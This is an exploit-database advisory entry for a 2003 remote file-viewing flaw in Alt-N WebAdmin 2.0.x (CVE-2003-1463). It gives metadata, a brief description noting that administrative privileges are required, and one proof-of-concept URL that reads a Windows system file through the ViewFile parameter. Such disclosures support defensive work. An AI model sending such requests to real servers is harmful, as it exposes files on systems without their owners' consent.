[] NeoSense

Alt-N WebAdmin 2.0.x - Remote File Viewing

Author: david@kamborio.net
type: remote
platform: cgi
port: 
date_added: 2003-04-25 
date_updated: 2012-11-07 
verified: 1 
codes: CVE-2003-1463;OSVDB-53493 
tags: 
aliases:  
screenshot_url:  
application_url: 

source: https://www.securityfocus.com/bid/7438/info

Alt-N WebAdmin allows a remote user to access files that they should not be able to access. The remote user can submit an HTTP request that will return the contents of any webserver-readable file on the system.

NOTE: The user must have administrative privileges in WebAdmin to access these files.

http://server/WebAdmin.dll?Session=X&Program=MDaemon&Directory:Name=C:\WINNT&File:Name=WIN.INI&View=ViewFile